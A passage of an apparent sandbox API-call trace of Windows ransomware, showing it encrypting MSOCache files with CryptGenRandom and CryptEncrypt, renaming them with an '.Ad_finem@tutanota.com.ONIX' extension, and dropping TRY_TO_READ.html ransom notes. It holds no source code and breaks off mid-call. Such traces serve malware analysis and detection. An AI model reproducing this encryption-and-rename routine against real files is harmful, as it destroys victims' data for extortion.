[0095.499] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0095.499] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.499] GetLastError () returned 0x0 [0095.499] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x484 [0095.500] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.500] LockFile (hFile=0x484, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x708, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.500] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.500] ReadFile (in: hFile=0x484, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.501] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.501] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.502] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.502] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.502] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", dwFileAttributes=0x80) returned 1 [0095.502] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 75 [0095.502] GetProcessHeap () returned 0x410000 [0095.502] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0095.502] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" [0095.502] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.502] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1800) returned 1 [0095.502] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x708 [0095.502] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.502] GetProcessHeap () returned 0x410000 [0095.502] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.502] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.502] WriteFile (in: hFile=0x484, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.506] WriteFile (in: hFile=0x484, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.507] WriteFile (in: hFile=0x484, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x708) returned 0x4b6b68 [0095.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x708) returned 0x4b7278 [0095.508] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.508] ReadFile (in: hFile=0x484, lpBuffer=0x4b6b68, nNumberOfBytesToRead=0x708, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6b68*, lpNumberOfBytesRead=0x367f44c*=0x708, lpOverlapped=0x0) returned 1 [0095.508] SetFilePointer (in: hFile=0x484, lDistanceToMove=-1800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.508] WriteFile (in: hFile=0x484, lpBuffer=0x4b7278*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b7278*, lpNumberOfBytesWritten=0x367f44c*=0x708, lpOverlapped=0x0) returned 1 [0095.509] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6b68 | out: hHeap=0x410000) returned 1 [0095.509] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b7278 | out: hHeap=0x410000) returned 1 [0095.509] UnlockFile (hFile=0x484, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x708, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.509] CloseHandle (hObject=0x484) returned 1 [0095.510] GetProcessHeap () returned 0x410000 [0095.510] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.510] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.512] GetProcessHeap () returned 0x410000 [0095.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0095.512] FindNextFileW (in: hFindFile=0x48e9f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0095.512] CloseHandle (hObject=0x3cc) returned 1 [0095.513] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.513] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x22, wMilliseconds=0x3ab)) [0095.513] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0095.513] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.513] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.513] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0095.513] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0095.514] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.514] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.514] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x460008 [0095.514] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0095.514] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458528 | out: hHeap=0x410000) returned 1 [0095.514] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f540 | out: hHeap=0x410000) returned 1 [0095.514] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ea30 [0095.514] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.514] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.514] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0095.514] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.514] GetLastError () returned 0x0 [0095.514] FindNextFileW (in: hFindFile=0x48ea30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0095.515] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.515] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.515] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0095.515] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.515] GetLastError () returned 0x0 [0095.515] FindNextFileW (in: hFindFile=0x48ea30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0095.515] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.515] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.515] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0095.515] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.515] GetLastError () returned 0x0 [0095.515] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0095.525] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0095.525] WriteFile (in: hFile=0x294, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0095.526] WriteFile (in: hFile=0x294, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0095.526] WriteFile (in: hFile=0x294, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0095.526] CloseHandle (hObject=0x294) returned 1 [0095.526] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449cf0 | out: hHeap=0x410000) returned 1 [0095.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0095.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0095.527] FindNextFileW (in: hFindFile=0x48ea30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0095.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.527] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.527] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0095.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.527] GetLastError () returned 0x0 [0095.527] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0095.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43a4a0 | out: hHeap=0x410000) returned 1 [0095.527] WriteFile (in: hFile=0x294, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0095.528] WriteFile (in: hFile=0x294, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0095.528] WriteFile (in: hFile=0x294, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0095.528] CloseHandle (hObject=0x294) returned 1 [0095.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0095.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0095.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449cf0 | out: hHeap=0x410000) returned 1 [0095.529] FindNextFileW (in: hFindFile=0x48ea30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0095.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0095.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.529] GetLastError () returned 0x0 [0095.529] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0095.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43a4a0 | out: hHeap=0x410000) returned 1 [0095.529] WriteFile (in: hFile=0x294, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0095.530] WriteFile (in: hFile=0x294, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0095.530] WriteFile (in: hFile=0x294, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0095.530] CloseHandle (hObject=0x294) returned 1 [0095.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0095.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0095.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0095.531] FindNextFileW (in: hFindFile=0x48ea30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0095.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.531] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.531] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0095.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.531] GetLastError () returned 0x0 [0095.531] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x294 [0095.531] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.531] LockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd4200, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.531] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.531] ReadFile (in: hFile=0x294, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.533] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.533] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.533] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.533] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.533] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", dwFileAttributes=0x80) returned 1 [0095.533] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 76 [0095.533] GetProcessHeap () returned 0x410000 [0095.533] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0095.533] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" [0095.533] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.533] GetFileSizeEx (in: hFile=0x294, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=868864) returned 1 [0095.533] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd4200 [0095.533] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.533] GetProcessHeap () returned 0x410000 [0095.533] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.533] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.534] WriteFile (in: hFile=0x294, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.536] WriteFile (in: hFile=0x294, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.537] WriteFile (in: hFile=0x294, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4200) returned 0x2680020 [0095.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4200) returned 